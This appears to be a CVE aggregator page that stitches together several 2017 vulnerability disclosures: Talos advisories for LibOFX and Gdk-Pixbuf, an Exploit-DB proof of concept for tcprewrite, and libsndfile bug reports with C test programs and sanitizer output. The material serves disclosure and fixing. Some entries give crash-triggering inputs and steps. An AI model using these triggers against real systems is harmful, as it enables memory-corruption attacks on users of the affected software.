157fe3989a245c58fcdb34d9fe722a3c4e14c008 - SHA1 (openssh-7.6p1.tar.gz) = a6984bc2c72192bed015c8b879b35dd9f5350b3b - SHA256 (openssh-7.6.tar.gz) = Xu3bdpCcu65vM2FnW7b6IKLgd4Kvf2P3WBTMw+I7Bao= - SHA256 (openssh-7.6p1.tar.gz) = oyPK7t3+FFuqoNsW6Y14Sx+8fdQ2pr8fR539XNHSFyM= Please note that the SHA256 signatures are base64 encoded and not hexadecimal (which is the default for most checksum tools). The PGP key used to sign the releases is available as RELEASE\_KEY.asc from the mirror sites. Reporting Bugs: =============== - Please read http://www.openssh.com/report.html Security bugs should be reported directly to openssh@openssh.com OpenSSH is brought to you by Markus Friedl, Niels Provos, Theo de Raadt, Kevin Steves, Damien Miller, Darren Tucker, Jason McIntyre, Tim Rice and Ben Lindstrom.

CVE-2017-15906

An exploitable buffer overflow vulnerability exists in the tag parsing functionality of LibOFX 0.9.11. A specially crafted OFX file can cause a write out of bounds resulting in a buffer overflow on the stack. An attacker can construct a malicious OFX file to trigger this vulnerability.

**Summary**

An exploitable buffer overflow vulnerability exists in the tag parsing functionality of LibOFX 0.9.11. A specially crafted OFX file can cause a write out of bounds resulting in a buffer overflow on the stack. An attacker can construct a malicious OFX file to trigger this vulnerability.

**Tested Versions**

LibOFX 0.9.11

**Product URLs**

https://github.com/libofx/libofx

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**Details**

OFX is the Open Financial Exchange format used by financial institutions to share financial data with clients. GnuCash is an open source financial-accounting software that has the capability to import OFX records using libOFX, an open source implementation of OFX.

While parsing the tags of the given OFX record, libOFX attempts to strip any present OFX proprietary tags. After checking that the file begins with the correct OFX tag of <OFX>, the remaining tag is sent over to be sanitized by sanitize_proprietary_tags. In this function, the tag is copied into a local stack variable called tagname as long as the parser is still within the opening tag \[0\].

    lib/ofx_preproc.cpp:75
    const unsigned int READ_BUFFER_SIZE = 1024;
    
    lib/ofx_preproc.cpp:417
    string sanitize_proprietary_tags(string input_string)
    {
    unsigned int i;
    size_t input_string_size;
    bool strip = false;
    bool tag_open = false;
    int tag_open_idx = 0; //Are we within < > ?
    bool closing_tag_open = false; //Are we within </ > ?
    int orig_tag_open_idx = 0;
    bool proprietary_tag = false; //Are we within a proprietary element?
    bool proprietary_closing_tag = false;
    int crop_end_idx = 0;
    char buffer[READ_BUFFER_SIZE] = "";
    char tagname[READ_BUFFER_SIZE] = "";
    int tagname_idx = 0;
    char close_tagname[READ_BUFFER_SIZE] = "";
    
    
    for (i = 0; i < input_string_size; i++)
    
        if (input_string.c_str()[i] == '<')
        {
        tag_open = true;
        tag_open_idx = i;
        if (proprietary_tag == true && input_string.c_str()[i+1] == '/')
        {
            ...
        }
        else if (proprietary_tag == true)
        {
            //It is the start of a new tag, following a proprietary tag
            crop_end_idx = i - 1;
            strip = true;
        }
        }
        else if (input_string.c_str()[i] == '>')
        {
            ...
        }
        else if (tag_open == true && closing_tag_open == false)
        {
        if (input_string.c_str()[i] == '.')
        {
            if (proprietary_tag != true)
            {
            orig_tag_open_idx = tag_open_idx;
            proprietary_tag = true;
            }
        }
        tagname[tagname_idx] = input_string.c_str()[i]; [0]
        tagname_idx++;
    

Because the loop occurs over the size of the input_string, if the input_string is larger than READ_BUFFER_SIZE, then the stack variable is overflown and can potentially lead to code execution.

**Crash Information**

    ==6542==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffbb4260 at pc 0x7fab9d30ccc1 bp 0x7fffffbb39b0 sp 0x7fffffbb39a8
    WRITE of size 1 at 0x7fffffbb4260 thread T0
    	#0 0x7fab9d30ccc0  (/home/vagrant/fuzzing/libofx-asan/libofx-0.9.11/lib/.libs/libofx.so.7+0x30cc0)
    	#1 0x7fab9d30aba0  (/home/vagrant/fuzzing/libofx-asan/libofx-0.9.11/lib/.libs/libofx.so.7+0x2eba0)
    	#2 0x7fab9d3057cb  (/home/vagrant/fuzzing/libofx-asan/libofx-0.9.11/lib/.libs/libofx.so.7+0x297cb)
    	#3 0x4f8ba2  (/home/vagrant/fuzzing/libofx-asan/libofx-0.9.11/ofxdump/.libs/lt-ofxdump+0x4f8ba2)
    	#4 0x7fab9c06982f  (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    	#5 0x419618  (/home/vagrant/fuzzing/libofx-asan/libofx-0.9.11/ofxdump/.libs/lt-ofxdump+0x419618)
    
    Address 0x7fffffbb4260 is located in stack of thread T0 at offset 2208 in frame
    	#0 0x7fab9d30c38f  (/home/vagrant/fuzzing/libofx-asan/libofx-0.9.11/lib/.libs/libofx.so.7+0x3038f)
    
    This frame has 9 object(s):
    	[32, 1056) 'buffer'
    	[1184, 2208) 'tagname' <== Memory access at offset 2208 overflows this variable
    	[2336, 3360) 'close_tagname'
    	[3488, 3520) ''
    	[3552, 3584) ''
    	[3616, 3617) ''
    	[3632, 3664) ''
    	[3696, 3728) ''
    	[3760, 3761) ''
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
    	(longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/vagrant/fuzzing/libofx-asan/libofx-
        0.9.11/lib/.libs/libofx.so.7+0x30cc0)
    Shadow bytes around the buggy address:
    0x10007ff6e7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10007ff6e800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10007ff6e810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10007ff6e820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10007ff6e830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007ff6e840: 00 00 00 00 00 00 00 00 00 00 00 00[f2]f2 f2 f2
    0x10007ff6e850: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00
    0x10007ff6e860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10007ff6e870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10007ff6e880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10007ff6e890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:           00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:       fa
    Heap right redzone:      fb
    Freed heap region:       fd
    Stack left redzone:      f1
    Stack mid redzone:       f2
    Stack right redzone:     f3
    Stack partial redzone:   f4
    Stack after return:      f5
    Stack use after scope:   f8
    Global redzone:          f9
    Global init order:       f6
    Poisoned by user:        f7
    Container overflow:      fc
    Array cookie:            ac
    Intra object redzone:    bb
    ASan internal:           fe
    Left alloca redzone:     ca
    Right alloca redzone:    cb
    ==6542==ABORTING
    

**Timeline**

2017-04-14 - Vendor Disclosure  
2017-09-13 - Public Release

Discovered by Cory Duplantis of Cisco Talos.

CVE-2017-2816: TALOS-2017-0317 || Cisco Talos Intelligence Group

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wandetect.php.

CVE-2017-14416: Pwning the Dlink 850L routers and abusing the MyDlink Cloud protocol

tcprewrite in Tcpreplay 3.4.4 has a Heap-Based Buffer Overflow vulnerability triggered by a crafted PCAP file, a related issue to CVE-2016-6160.

    ################
    #Title: tcprewrite Heap-Based Buffer Overflow
    #CVE: CVE-2017-14266
    #CWE: CWE-122
    #Exploit Author: Hosein Askari(FarazPajohan)
    #Vendor HomePage: http://tcpreplay.synfin.net/
    #Product Description: When you want to give a PCAP file to someone, it gives away certain sensitive information such as an organizations internal IP range,
    IP addresses of sensitive company assets, MAC addresses of critical hardware that could identify the product vendors. Tcprewrite is a security tool to rewrite packets stored
    in PCAP file format, such as created by tools such as tcpdump and ethereal.
    #Version : 3.4.4 Released under the Free BSD License
    #Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)
    #Date: 11-09-2017
    #Category: Application
    #Author Mail : hosein.askari@aol.com
    #Description: tcprewrite in Tcpreplay 3.4.4 has a Heap-Based Buffer Overflow vulnerability triggered by a crafted PCAP file can cause a memory corruption and potential code execution.
    ###############
    #First we make a crafted file and send it to the network and capture its information by wireshark.
    ~Step 1:
    sudo echo -ne '\x63\x72\x61\x66\x74\x65\x64\x20\x66\x69\x6c\x65\x20\x69\x73\x20\x6d\x61\x64\x65\x20\x62\x79\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=200 of=tcp3.txt
    ~Step 2(Sending the information and capturing by wireshark):
    import os
    for i in range(1,20):
            os.system("cat tcp3.txt | nc 127.0.0.1 21")
    ~Step 3(Using tcprewrite):
    sudo  tcprewrite --portmap=21:2121 --infile=tcp.pcap --outfile=output.pcap
    ################
    #POC:
    constantine@constantine:~/Downloads/DrMemory-Linux-1.11.0-2/bin$ sudo ./drmemory -- tcprewrite --portmap=21:2121 --infile=tcp.pcap --outfile=output.pcap
    ~~Dr.M~~ Dr. Memory version 1.11.0
    ~~Dr.M~~ WARNING: application is missing line number information.
    ~~Dr.M~~
    ~~Dr.M~~ Error #1: UNADDRESSABLE ACCESS beyond heap bounds: writing 0x080d458f-0x080d4590 1 byte(s) within 0x080d458c-0x080d4590
    ~~Dr.M~~ # 0 replace_memcpy               [/work/drmemory_package/drmemory/replace.c:246]
    ~~Dr.M~~ # 1 tcprewrite!?                +0x0      (0x0804ae59 <tcprewrite+0x2e59>)
    ~~Dr.M~~ # 2 tcprewrite!?                +0x0      (0x08049f91 <tcprewrite+0x1f91>)
    ~~Dr.M~~ # 3 tcprewrite!?                +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
    ~~Dr.M~~ Note: @0:00:01.045 in thread 2521
    ~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af
    ~~Dr.M~~ Note: instruction: mov    %eax -> (%ebx)
    ~~Dr.M~~
    ~~Dr.M~~ Error #2: UNADDRESSABLE ACCESS beyond heap bounds: writing 0x080d459c-0x080d459d 1 byte(s)
    ~~Dr.M~~ # 0 replace_memcpy               [/work/drmemory_package/drmemory/replace.c:252]
    ~~Dr.M~~ # 1 tcprewrite!?                +0x0      (0x0804ae59 <tcprewrite+0x2e59>)
    ~~Dr.M~~ # 2 tcprewrite!?                +0x0      (0x08049f91 <tcprewrite+0x1f91>)
    ~~Dr.M~~ # 3 tcprewrite!?                +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
    ~~Dr.M~~ Note: @0:00:01.047 in thread 2521
    ~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af
    ~~Dr.M~~ Note: instruction: mov    %dl -> (%eax)
    ~~Dr.M~~
    ~~Dr.M~~ Error #3: UNADDRESSABLE ACCESS beyond heap bounds: reading 0x080d458f-0x080d4591 2 byte(s) within 0x080d458d-0x080d4591
    ~~Dr.M~~ # 0 libc.so.6!__GI___mempcpy              [../sysdeps/i386/i686/multiarch/../mempcpy.S:54]
    ~~Dr.M~~ # 1 libc.so.6!__GI__IO_default_xsputn     [/build/glibc-KM3i_a/glibc-2.23/libio/genops.c:438]
    ~~Dr.M~~ # 2 libc.so.6!_IO_new_file_xsputn         [/build/glibc-KM3i_a/glibc-2.23/libio/fileops.c:1352]
    ~~Dr.M~~ # 3 libc.so.6!__GI__IO_fwrite             [/build/glibc-KM3i_a/glibc-2.23/libio/iofwrite.c:39]
    ~~Dr.M~~ # 4 libpcap.so.0.8!pcap_dump             +0x5f     (0xb79f1100 <libpcap.so.0.8+0x1d100>)
    ~~Dr.M~~ # 5 tcprewrite!?                         +0x0      (0x0804adc6 <tcprewrite+0x2dc6>)
    ~~Dr.M~~ # 6 tcprewrite!?                         +0x0      (0x08049f91 <tcprewrite+0x1f91>)
    ~~Dr.M~~ # 7 tcprewrite!?                         +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
    ~~Dr.M~~ Note: @0:00:01.071 in thread 2521
    ~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af
    ~~Dr.M~~ Note: instruction: rep movs %ds%esi) %esi %edi %ecx -> %es%edi) %esi %edi %ecx
    ~~Dr.M~~
    ~~Dr.M~~ Error #4: LEAK 8 direct bytes 0x080c3168-0x080c3170 + 0 indirect bytes
    ~~Dr.M~~ # 0 replace_malloc               [/work/drmemory_package/common/alloc_replace.c:2576]
    ~~Dr.M~~ # 1 tcprewrite!?                +0x0      (0x08059e6c <tcprewrite+0x11e6c>)
    ~~Dr.M~~ # 2 tcprewrite!?                +0x0      (0x0804ea21 <tcprewrite+0x6a21>)
    ~~Dr.M~~ # 3 tcprewrite!?                +0x0      (0x0804c264 <tcprewrite+0x4264>)
    ~~Dr.M~~ # 4 tcprewrite!?                +0x0      (0x08049e0c <tcprewrite+0x1e0c>)
    ~~Dr.M~~ # 5 tcprewrite!?                +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
    <Application /usr/bin/tcprewrite (2521).  Dr. Memory internal crash at PC 0x7384d6d5.  Please report this at http://drmemory.org/issues.  Program aborted.
    Received SIGSEGV at client library pc 0x7384d6d5 in thread 2521
    Base: 0xb7e25000
    Registers:eax=0x00000000 ebx=0x73934a30 ecx=0x00000002 edx=0x739355c0
    esi=0x4b200ba8 edi=0x00000006 esp=0x4a0c6814 ebp=0x00000000
    eflags=0x000102
    1.11.0-2-(Aug 29 2016 02:45:30)0
    -no_dynamic_options -disasm_mask 8 -logdir '/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/drmemory/logs/dynamorio' -client_lib '/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/bin/release/libdrmemorylib.so;0;-logdir `/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/drmemory/logs` -symcache_dir `/home/constan
    /home/constantine/Downloads/DrMemory-Linux-1.11.0-2/bin/release/libdrmemorylib.so=0x73800000
    /usr/lib/i386-linux-gnu/libstdc++.so.6=0xb7c84000
    /lib/i386-linux-gnu/libgcc_s.so.1=0xb7a33000
    /lib/i386-linux-gnu/libm.so.6=0xb7c2e000
    /lib/i386-linux-gnu/libc.so.6=0xb7a77000
    /lib/ld-linux.so.2=0xb7a51000>

CVE-2017-14266: Offensive Security’s Exploit Database Archive

An exploitable integer overflow vulnerability exists in the tiff_image_parse functionality of Gdk-Pixbuf 2.36.6 when compiled with Clang. A specially crafted tiff file can cause a heap-overflow resulting in remote code execution. An attacker can send a file or a URL to trigger this vulnerability.

**Summary**

An exploitable integer overflow vulnerability exists in the tiff\_image\_parse functionality of Gdk-Pixbuf 2.36.6 when compiled with Clang. A specially crafted tiff file can cause a heap-overflow resulting in remote code execution. An attacker can send a file or a URL to trigger this vulnerability.

**Tested Versions**

Gdk-Pixbuf 2.36.6 commit: aba8d88798dfc2f3856ea0ddda14b06174bbb2bc compiled with clang -O3 flag libtiff 4.0.6

**Product URLs**

https://developer.gnome.org/gdk-pixbuf/

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-758: Reliance on Undefined, Unspecified, or Implementation-Defined Behavior

**Details**

    Gdk-Pixbuf is a toolkit for image loading and pixel buffer manipulation used in various type of desktop applications: image viewers(GNOME thumbnailer), web browsers (Chromium, Firefox), media players (VLC), etc. The vulnerability exists in the TIFF parser and only manifests itself when the library is compiled with high optimization flags `-O3` (tested with Clang, gcc does not remove the check). Several defined `if statements`  inside the `tiff_image_parse` function  are responsible of integer overflow checks or at least that was their intention. Because the checks are made on signed integers, the condition cannot evaluate to false unless an  integer overflow occurs.  According to the C standard, a signed integer overflow is defined as "Undefined Bahavior", thus behaviour related to it is implementation dependent and in the case of Clang the check is removed. Finally the lack of proper integer overflows check leads to heap overflow and can allow attackers to obtain arbitrary code execution.
    

The code below is removed from compilation process because it would be true if a signed integer overflow would occur which is undefined bahavior:

    Line 89         gint width, height, rowstride, bytes;
    Line 128        rowstride = width * 4;
    Line 129        if (rowstride / 4 != width) { /* overflow */
    Line 130                g_set_error_literal (error,
    Line 131                                     GDK_PIXBUF_ERROR,
    Line 132                                     GDK_PIXBUF_ERROR_CORRUPT_IMAGE,
    Line 133                                     _("Dimensions of TIFF image too large"));
    Line 134                return NULL;                
    Line 135        }
    Line 136        
    Line 137        bytes = height * rowstride;
    Line 138        if (bytes / rowstride != height) { /* overflow */
    Line 139                g_set_error_literal (error,
    Line 140                                     GDK_PIXBUF_ERROR,
    Line 141                                     GDK_PIXBUF_ERROR_CORRUPT_IMAGE,
    Line 142                                     _("Dimensions of TIFF image too large"));
    Line 143                return NULL;                
    Line 144        }
    

in our case the variables have the following values:

    width  = 0x8020
    height = 0xfff7
    

which causes an integer overflow at line 137:

    bytes = height * ( width * 4)
    

Then, based on the overflowed value, a buffer is allocated :

    Line 160       pixels = g_try_malloc (bytes);
    

Then all three parameters: width,height and the allocated bytes buffer are passed as arguments:

    Line 272		if (!TIFFReadRGBAImageOriented (tiff, width, height, (uint32 *)pixels, ORIENTATION_TOPLEFT, 1)) {	
    

Because buffer bytes was allocated based on overflowed value, width and height parameters mismatch the size of the buffer which leads to out of bound writes (Line 1362) inside the put1bitbwtile function while reading RGB values:

    libtiff/tif_getimage.c:1326
    Line 1351	/*
    Line 1352	 * 1-bit bilevel => colormap/RGB
    Line 1353	 */
    Line 1354	DECLAREContigPutFunc(put1bitbwtile)
    Line 1355	{
    Line 1356		uint32** BWmap = img->BWmap;
    Line 1357
    Line 1358		(void) x; (void) y;
    Line 1359		fromskew /= 8;
    Line 1360		while (h-- > 0) {
    Line 1361		uint32* bw;
    Line 1362		UNROLL8(w, bw = BWmap[*pp++], *cp++ = *bw++);
    Line 1363		cp += toskew;
    Line 1364		pp += fromskew;
    Line 1365		}
    Line 1366	}	
    

**Crash Information**

    valgrind ./pixbuf-read crashes/tiff_bug.tiff
    ==32378== Invalid write of size 4
    ==32378==    at 0x4B5D71D: put1bitbwtile (tif_getimage.c:1326)
    ==32378==    by 0x4B5BE5E: gtTileContig (tif_getimage.c:673)
    ==32378==    by 0x4B5B810: TIFFRGBAImageGet (tif_getimage.c:495)
    ==32378==    by 0x4B5B8ED: TIFFReadRGBAImageOriented (tif_getimage.c:514)
    ==32378==    by 0x4067A59: tiff_image_parse (io-tiff.c:272)
    ==32378==    by 0x406634C: gdk_pixbuf__tiff_image_stop_load (io-tiff.c:477)
    ==32378==    by 0x4048442: gdk_pixbuf_loader_close (gdk-pixbuf-loader.c:822)
    ==32378==    by 0x8048903: test_loader (pixbuf-read.c:35)
    ==32378==    by 0x8048903: main (pixbuf-read.c:75)
    ==32378==  Address 0x5343ba8 is 0 bytes after a block of size 7,207,808 alloc'd
    ==32378==    at 0x402D17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
    ==32378==    by 0x432C3BF: g_try_malloc (in /lib/i386-linux-gnu/libglib-2.0.so.0.4800.2)
    ==32378==    by 0x4067584: tiff_image_parse (io-tiff.c:160)
    ==32378==    by 0x406634C: gdk_pixbuf__tiff_image_stop_load (io-tiff.c:477)
    ==32378==    by 0x4048442: gdk_pixbuf_loader_close (gdk-pixbuf-loader.c:822)
    ==32378==    by 0x8048903: test_loader (pixbuf-read.c:35)
    ==32378==    by 0x8048903: main (pixbuf-read.c:75)
    

**Timeline**

2017-07-13 - Vendor Disclosure  
2017-08-30 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2017-2870: TALOS-2017-0377 || Cisco Talos Intelligence Group

Heap-based Buffer Overflow in the psf_binheader_writef function in common.c in libsndfile through 1.0.28 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact.

1.  Case 's' only enlarges the buffer by 16 bytes instead of size bytes.  
    This issue had originally reported by funute against openmpt123 (see https://bugs.openmpt.org/view.php?id=974 ). openmpt123 uses libsndfile to write WAV files and can output large amounts of string data in the SF_STR_COMMENT metadata field.  
    Valgrind stacktrace (libsndfile 1.0.28):

    manx@sagnix:~/projects/openmpt/trunk$ valgrind bin/openmpt123 --quiet test2.it --force -o test.wav
    ==23301== Memcheck, a memory error detector
    ==23301== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
    ==23301== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
    ==23301== Command: bin/openmpt123 --quiet test2.it --force -o test.wav
    ==23301== 
    ==23301== Invalid write of size 1
    ==23301==    at 0x4031F43: memcpy (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
    ==23301==    by 0x4527B6E: memcpy (string3.h:53)
    ==23301==    by 0x4527B6E: psf_binheader_writef (common.c:687)
    ==23301==    by 0x450BC61: wavlike_write_strings (wavlike.c:1123)
    ==23301==    by 0x450C91C: wav_write_header (wav.c:1062)
    ==23301==    by 0x44EFCEC: sf_writef_float (sndfile.c:2451)
    ==23301==    by 0x805ACC4: openmpt123::sndfile_stream_raii::write(std::vector<float*, std::allocator<float*> >, unsigned int) (in /home/manx/projects/openmpt/trunk/bin/openmpt123)
    [...]
    

Test case in bug1.c (tested on Ubuntu 14.04 x86-64 with libsndfile 1.0.28):

    /* gcc -std=c99 -O2 -g -Wall -Wextra bug1.c -lsndfile && valgrind ./a.out */
    
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sndfile.h>
    
    #define LENGTH_FRAMES 10
    
    static int16_t buffer[LENGTH_FRAMES*2];
    
    void add_string( SNDFILE * sf, int str_type, size_t len ) {
    
    	char * str = NULL;
    
    	str = calloc( len + 1, 1 );
    	if ( !str ) {
    		fprintf( stderr, "%s\n", "error" );
    		exit( 1 );	
    	}
    	memset( str, 'x', len );
    	sf_set_string( sf, str_type, str );
    	free( str );
    	str = NULL;
    
    }
    
    void test( int format, size_t first, size_t second, size_t third ) {
    
    	SNDFILE * sf = NULL;
    	SF_INFO info;
    	memset( &info, 0, sizeof( SF_INFO ) );
    	
    	fprintf( stderr, "%zd %zd %zd\n", first, second, third );
    
    	info.samplerate = 44100;
    	info.channels = 2;
    	info.format = format | SF_FORMAT_PCM_16;
    	sf = sf_open( "dummy", SFM_WRITE, &info );
    	if ( !sf ) {
    		fprintf( stderr, "%s\n", "error" );
    		exit( 1 );
    	}
    	
    	add_string( sf, SF_STR_TITLE, first );
    	add_string( sf, SF_STR_ARTIST, second );
    	add_string( sf, SF_STR_COMMENT, third );
    	
    	sf_writef_short( sf, buffer, LENGTH_FRAMES );
    	
    	sf_close( sf );
    	sf = NULL;
    
    }
    
    int main() {
    
    	test( SF_FORMAT_WAV, 456, 190, 0 );
    
    	/*
    	for ( size_t a = 440; a <= 460; a++ ) {
    		for ( size_t b = 190; b <= 210; b++ ) {
    			for ( size_t c = 0; c <= 0; c++ ) {
    				test( SF_FORMAT_WAV, a, b, c );
    			}
    		}
    	}
    	*/
    
    	return 0;
    
    }
    

    manx@idefix ~/test $ gcc -std=c99 -O2 -g -Wall -Wextra bug1.c -lsndfile && valgrind ./a.out
    ==14278== Memcheck, a memory error detector
    ==14278== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
    ==14278== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info
    ==14278== Command: ./a.out
    ==14278== 
    456 190 0
    ==14278== Invalid write of size 2
    ==14278==    at 0x4C2F7E3: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==14278==    by 0x4E6DD8F: memcpy (string3.h:51)
    ==14278==    by 0x4E6DD8F: psf_binheader_writef (common.c:687)
    ==14278==    by 0x4E56250: wavlike_write_strings (wavlike.c:1095)
    ==14278==    by 0x4E57001: wav_write_header (wav.c:1062)
    ==14278==    by 0x4E3F92D: sf_writef_short (sndfile.c:2223)
    ==14278==    by 0x400AFB: test (bug1.c:50)
    ==14278==    by 0x4008B9: main (bug1.c:59)
    ==14278==  Address 0x57791e0 is 0 bytes after a block of size 512 alloc'd
    ==14278==    at 0x4C2CE8E: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==14278==    by 0x4E6D923: psf_bump_header_allocation (common.c:68)
    ==14278==    by 0x4E6E8BC: psf_binheader_writef (common.c:680)
    ==14278==    by 0x4E56250: wavlike_write_strings (wavlike.c:1095)
    ==14278==    by 0x4E57001: wav_write_header (wav.c:1062)
    ==14278==    by 0x4E3F92D: sf_writef_short (sndfile.c:2223)
    ==14278==    by 0x400AFB: test (bug1.c:50)
    ==14278==    by 0x4008B9: main (bug1.c:59)
    ==14278== 
    ==14278== Invalid write of size 1
    ==14278==    at 0x4E6DDA8: psf_binheader_writef (common.c:689)
    ==14278==    by 0x4E56250: wavlike_write_strings (wavlike.c:1095)
    ==14278==    by 0x4E57001: wav_write_header (wav.c:1062)
    ==14278==    by 0x4E3F92D: sf_writef_short (sndfile.c:2223)
    ==14278==    by 0x400AFB: test (bug1.c:50)
    ==14278==    by 0x4008B9: main (bug1.c:59)
    ==14278==  Address 0x57791e1 is 1 bytes after a block of size 512 alloc'd
    ==14278==    at 0x4C2CE8E: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==14278==    by 0x4E6D923: psf_bump_header_allocation (common.c:68)
    ==14278==    by 0x4E6E8BC: psf_binheader_writef (common.c:680)
    ==14278==    by 0x4E56250: wavlike_write_strings (wavlike.c:1095)
    ==14278==    by 0x4E57001: wav_write_header (wav.c:1062)
    ==14278==    by 0x4E3F92D: sf_writef_short (sndfile.c:2223)
    ==14278==    by 0x400AFB: test (bug1.c:50)
    ==14278==    by 0x4008B9: main (bug1.c:59)
    ==14278== 
    ==14278== Syscall param write(buf) points to uninitialised byte(s)
    ==14278==    at 0x5195F80: __write_nocancel (syscall-template.S:81)
    ==14278==    by 0x4E712C9: psf_fwrite (file_io.c:377)
    ==14278==    by 0x4E56C3E: wav_write_header (wav.c:1120)
    ==14278==    by 0x4E3F92D: sf_writef_short (sndfile.c:2223)
    ==14278==    by 0x400AFB: test (bug1.c:50)
    ==14278==    by 0x4008B9: main (bug1.c:59)
    ==14278==  Address 0x5779420 is 512 bytes inside a block of size 1,024 alloc'd
    ==14278==    at 0x4C2CE8E: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==14278==    by 0x4E6D923: psf_bump_header_allocation (common.c:68)
    ==14278==    by 0x4E6E63C: psf_binheader_writef (common.c:563)
    ==14278==    by 0x4E561C0: wavlike_write_strings (wavlike.c:1103)
    ==14278==    by 0x4E57001: wav_write_header (wav.c:1062)
    ==14278==    by 0x4E3F92D: sf_writef_short (sndfile.c:2223)
    ==14278==    by 0x400AFB: test (bug1.c:50)
    ==14278==    by 0x4008B9: main (bug1.c:59)
    ==14278== 
    ==14278== 
    ==14278== HEAP SUMMARY:
    ==14278==     in use at exit: 0 bytes in 0 blocks
    ==14278==   total heap usage: 10 allocs, 10 frees, 17,271 bytes allocated
    ==14278== 
    ==14278== All heap blocks were freed -- no leaks are possible
    ==14278== 
    ==14278== For counts of detected and suppressed errors, rerun with: -v
    ==14278== Use --track-origins=yes to see where uninitialised values come from
    ==14278== ERROR SUMMARY: 4 errors from 3 contexts (suppressed: 0 from 0)
    

2.  psf_binheader_writef in src/common.c enlarges the header buffer (if needed) prior to the big switch statement by an amount (16 bytes) which is enough for all cases where only a single value gets added. Cases 's', 'S', 'p' however additionally write an arbitrary length block of data and again enlarge the buffer to the required amount. However, the required space calculation does not take into account the size of the length field which gets output before the data.  
    Test case bug2.c (tested on Ubuntu 14.04 x86-64 with libsndfile 1.0.28 with 16 replaced by size in the buffer size calculation):

    /* gcc -std=c99 -O2 -g -Wall -Wextra bug2.c -lsndfile && valgrind ./a.out */
    
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sndfile.h>
    
    #define LENGTH_FRAMES 10
    
    static int16_t buffer[LENGTH_FRAMES*2];
    
    void add_string( SNDFILE * sf, int str_type, size_t len ) {
    
    	char * str = NULL;
    
    	str = calloc( len + 1, 1 );
    	if ( !str ) {
    		fprintf( stderr, "%s\n", "error" );
    		exit( 1 );	
    	}
    	memset( str, 'x', len );
    	sf_set_string( sf, str_type, str );
    	free( str );
    	str = NULL;
    
    }
    
    void test( int format, size_t first, size_t second, size_t third ) {
    
    	SNDFILE * sf = NULL;
    	SF_INFO info;
    	memset( &info, 0, sizeof( SF_INFO ) );
    
    	fprintf( stderr, "%zd %zd %zd\n", first, second, third );
    	
    	info.samplerate = 44100;
    	info.channels = 2;
    	info.format = format | SF_FORMAT_PCM_16;
    	sf = sf_open( "dummy", SFM_WRITE, &info );
    	if ( !sf ) {
    		fprintf( stderr, "%s\n", "error" );
    		exit( 1 );
    	}
    	
    	add_string( sf, SF_STR_TITLE, first );
    	add_string( sf, SF_STR_ARTIST, second );
    	add_string( sf, SF_STR_COMMENT, third );
    	
    	sf_writef_short( sf, buffer, LENGTH_FRAMES );
    	
    	sf_close( sf );
    	sf = NULL;
    
    }
    
    int main() {
    
    	test( SF_FORMAT_WAV, 0, 200, 0 );
    
    	/*
    	for ( size_t a = 0; a <= 20; a++ ) {
    		for ( size_t b = 190; b <= 210; b++ ) {
    			for ( size_t c = 0; c <= 0; c++ ) {
    				test( SF_FORMAT_WAV, a, b, c );
    			}
    		}
    	}
    	*/
    
    	return 0;
    
    }
    

    manx@idefix ~/test $ gcc -std=c99 -O2 -g -Wall -Wextra bug2.c -lsndfile && valgrind ./a.out
    ==15481== Memcheck, a memory error detector
    ==15481== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
